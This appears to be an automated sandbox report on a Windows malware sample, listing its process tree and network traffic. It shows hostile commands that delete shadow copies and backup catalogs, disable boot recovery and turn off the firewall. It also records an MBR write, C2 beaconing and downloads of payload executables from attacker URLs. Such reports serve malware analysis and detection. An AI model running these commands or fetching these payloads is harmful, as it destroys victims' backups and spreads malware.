"C:\Users\Admin\AppData\Local\Temp\b5b467e9309cbddb4a9ed34a82a36163.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364
- C:\Users\Admin\AppData\Local\Temp\b5b467e9309cbddb4a9ed34a82a36163.exe
  C:\Users\Admin\AppData\Local\Temp\b5b467e9309cbddb4a9ed34a82a36163.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4904

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Windows\system32\certreq.exe
  "C:\Windows\system32\certreq.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:4760
- C:\Users\Admin\AppData\Local\Temp\139E.exe
  C:\Users\Admin\AppData\Local\Temp\139E.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Users\Admin\AppData\Local\Temp\139E.exe
    C:\Users\Admin\AppData\Local\Temp\139E.exe
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\139E.exe
      "C:\Users\Admin\AppData\Local\Temp\139E.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:2736
    - - C:\Users\Admin\AppData\Local\Temp\139E.exe
        
        C:\Users\Admin\AppData\Local\Temp\139E.exe
        5⤵
        Executes dropped EXE
        
        PID:1064
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:1172
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4160
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3420
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2080
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4272
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:464
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2300
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        5⤵
        Modifies Windows Firewall
        
        PID:3580
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=disable
        5⤵
        Modifies Windows Firewall
        
        PID:2752
- C:\Users\Admin\AppData\Local\Temp\1544.exe
  C:\Users\Admin\AppData\Local\Temp\1544.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- - C:\Users\Admin\AppData\Local\Temp\1544.exe
    "C:\Users\Admin\AppData\Local\Temp\1544.exe"
    3⤵
    - Executes dropped EXE
    PID:3240
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  - Accesses Microsoft Outlook profiles
  - outlook_office_path
  - outlook_win_path
  PID:3860
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:2612
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:3776
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:3480
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:4900
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:904
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:3236
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1264
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:2612
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1304
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:184
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:860
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:5044
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:3152
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  - Suspicious behavior: MapViewOfSection
  PID:3148
- - C:\Users\Admin\AppData\Local\Temp\DCBA.tmp\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\DCBA.tmp\svchost.exe -debug
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of FindShellTrayWindow
    PID:4356
  - - C:\Windows\SYSTEM32\rundll32.exe
      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\DCBA.tmp\aa_nts.dll",run
      4⤵
      Loads dropped DLL
      PID:2976

C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
"C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:4852
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:2444
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:4108
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:2200
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:1764
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:4136
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:3160
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:1736
- C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  C:\Users\Admin\AppData\Local\Microsoft\V]5jPPdpdb.exe
  2⤵
  - Executes dropped EXE
  PID:4596

C:\Users\Admin\AppData\Local\Microsoft\m_Rb%.exe
"C:\Users\Admin\AppData\Local\Microsoft\m_Rb%.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4368
- C:\Users\Admin\AppData\Local\Microsoft\m_Rb%.exe
  C:\Users\Admin\AppData\Local\Microsoft\m_Rb%.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1156
- C:\Users\Admin\AppData\Local\Microsoft\m_Rb%.exe
  C:\Users\Admin\AppData\Local\Microsoft\m_Rb%.exe
  2⤵
  - Executes dropped EXE
  PID:264

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:116

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1276

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:4076

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

126.23.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.23.238.8.in-addr.arpa

IN PTR

Response
DNS

136.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

amxt25.xyz

certreq.exe

Remote address:

8.8.8.8:53

Request

amxt25.xyz

IN A

Response

amxt25.xyz

IN A

45.131.66.61
GET

http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

b5b467e9309cbddb4a9ed34a82a36163.exe

Remote address:

45.131.66.61:80

Request

GET /a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd HTTP/1.1
Host: amxt25.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
If-Match: "/yZDlE2tRgNj17JQiOusTrHUTuIjzszFIUTJWzLUdvGgJtJb4vt0ts2K2Ih3YZQpTcfyUJyNt831TpG2Kj5ikgBlbi1VUw=="
Connection: close

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:31:58 GMT
Content-Type: audio/wav
Content-Length: 1889958
Connection: close
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

61.66.131.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.66.131.45.in-addr.arpa

IN PTR

Response
DNS

61.66.131.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.66.131.45.in-addr.arpa

IN PTR
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

126.22.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.22.238.8.in-addr.arpa

IN PTR

Response
GET

http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

certreq.exe

Remote address:

45.131.66.61:80

Request

GET /a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd HTTP/1.1
Host: amxt25.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Upgrade: websocket
Connection: upgrade
Sec-Websocket-Version: 13
Sec-Websocket-Key: a2wAfYN89ipxtMW

Response

HTTP/1.1 101 Switching Protocols

Server: nginx
Date: Wed, 11 Oct 2023 19:32:16 GMT
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: lNZ8zUEimmq9fehuEU4MqDQ2PJc=
GET

http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

certreq.exe

Remote address:

45.131.66.61:80

Request

GET /a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd HTTP/1.1
Host: amxt25.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Upgrade: websocket
Connection: upgrade
Sec-Websocket-Version: 13
Sec-Websocket-Key: CEdgKQEe93P0uVa

Response

HTTP/1.1 101 Switching Protocols

Server: nginx
Date: Wed, 11 Oct 2023 19:32:22 GMT
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: L+XMpnRjxZy+42SPhjV/Zx+V9Dw=
DNS

servermlogs27.xyz

svchost.exe

Remote address:

8.8.8.8:53

Request

servermlogs27.xyz

IN A

Response

servermlogs27.xyz

IN A

45.131.66.120
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wdrwsdtkwdpspvje.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:32:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eeqvrojnesslfva.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 357
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:32:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://phwfmrjocsrhmvj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 192
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:32:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yfoidhkyksonr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 285
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:32:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nqdhfcksjqghcfn.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 287
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vxvumhkhsuswiv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 172
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fipvnpfsqwn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: servermlogs27.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://arjvgorxuyqd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 341
Host: servermlogs27.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://owwyqdjwwxpifns.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 159
Host: servermlogs27.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ytqpwrliwdgs.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 253
Host: servermlogs27.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cjoqulyhqphw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 174
Host: servermlogs27.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xeowfetadow.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 170
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:32:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yyamqqhtypgc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 338
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:33:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

Explorer.EXE

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://beucufustojvl.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 127
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:33:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
DNS

xemtex534.xyz

Remote address:

8.8.8.8:53

Request

xemtex534.xyz

IN A

Response

xemtex534.xyz

IN A

45.131.66.222
GET

http://xemtex534.xyz/777/mtxsYHJ.exe

Explorer.EXE

Remote address:

45.131.66.222:80

Request

GET /777/mtxsYHJ.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: xemtex534.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:32:45 GMT
Content-Type: application/octet-stream
Content-Length: 430592
Connection: keep-alive
Last-Modified: Wed, 11 Oct 2023 18:35:02 GMT
ETag: "6526ead6-69200"
Accept-Ranges: bytes
GET

http://xemtex534.xyz/777/skxKIGw.exe

Explorer.EXE

Remote address:

45.131.66.222:80

Request

GET /777/skxKIGw.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: xemtex534.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:32:45 GMT
Content-Type: application/octet-stream
Content-Length: 479232
Connection: keep-alive
Last-Modified: Wed, 11 Oct 2023 18:35:02 GMT
ETag: "6526ead6-75000"
Accept-Ranges: bytes
DNS

120.66.131.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

120.66.131.45.in-addr.arpa

IN PTR

Response
DNS

222.66.131.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.66.131.45.in-addr.arpa

IN PTR

Response
DNS

files.catbox.moe

Remote address:

8.8.8.8:53

Request

files.catbox.moe

IN A

Response

files.catbox.moe

IN A

108.181.20.35
GET

https://files.catbox.moe/k1glod.bat

Explorer.EXE

Remote address:

108.181.20.35:443

Request

GET /k1glod.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: files.catbox.moe

Response

HTTP/1.1 200 OK

Server: nginx/1.21.3
Date: Wed, 11 Oct 2023 19:32:47 GMT
Content-Type: application/octet-stream
Content-Length: 13175090
Last-Modified: Sun, 08 Oct 2023 07:16:31 GMT
Connection: keep-alive
ETag: "6522574f-c90932"
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD
Accept-Ranges: bytes
DNS

35.20.181.108.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.20.181.108.in-addr.arpa

IN PTR

Response
DNS

shorturl.at

Remote address:

8.8.8.8:53

Request

shorturl.at

IN A

Response

shorturl.at

IN A

172.67.69.88

shorturl.at

IN A

104.26.9.129

shorturl.at

IN A

104.26.8.129
GET

https://shorturl.at/moPSY

Explorer.EXE

Remote address:

172.67.69.88:443

Request

GET /moPSY HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: shorturl.at

Response

HTTP/1.1 301 Moved Permanently

Date: Wed, 11 Oct 2023 19:33:20 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
location: https://www.shorturl.at/moPSY
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-nginx-upstream-cache-status: MISS
x-server-powered-by: Engintron
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZYFOskvr5jTiNOgTJVSyJUga2OgvPQFUJJTLGmpEusw7d7cOjti9TaqOVIRv89prHv84GwU8VqFpqFShjGXqIebXNxPE%2BNFoeC%2FZVZZb%2BiurKsGUvql9j80FDZy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814988c3cc44b95a-AMS
DNS

www.shorturl.at

Remote address:

8.8.8.8:53

Request

www.shorturl.at

IN A

Response

www.shorturl.at

IN A

104.26.8.129

www.shorturl.at

IN A

104.26.9.129

www.shorturl.at

IN A

172.67.69.88
GET

https://www.shorturl.at/moPSY

Explorer.EXE

Remote address:

104.26.8.129:443

Request

GET /moPSY HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: www.shorturl.at

Response

HTTP/1.1 302 Found

Date: Wed, 11 Oct 2023 19:33:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
location: https://www.dropbox.com/scl/fi/ooxede6dbp3m16b7h6890/Run.exe?rlkey=b45sdlyibhsdkvy53dnzajfof&dl=1
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-nginx-upstream-cache-status: MISS
x-server-powered-by: Engintron
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VCNkhvtB45keoRJeYhgBrl3RciaRQc8hkS1RKP8pn7j2f6oPLLb2PBrffQN5rQBQidIFcrWnIuCHhqDkgYHUlxMhjt2G27eMz2dbUS4N6U%2FsxecQvrhYSHFyIyfSfkjnhw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814988c75a860b73-AMS
GET

https://www.shorturl.at/nvLX2

Explorer.EXE

Remote address:

104.26.8.129:443

Request

GET /nvLX2 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: www.shorturl.at

Response

HTTP/1.1 302 Found

Date: Wed, 11 Oct 2023 19:33:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
location: https://www.dropbox.com/scl/fi/gg8zfy94fcoifxga6t0hs/pew.EXE?rlkey=78zqk5k7bkps0zw8uzqxkvcfi&dl=1
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-nginx-upstream-cache-status: MISS
x-server-powered-by: Engintron
CF-Cache-Status: DYNAMIC
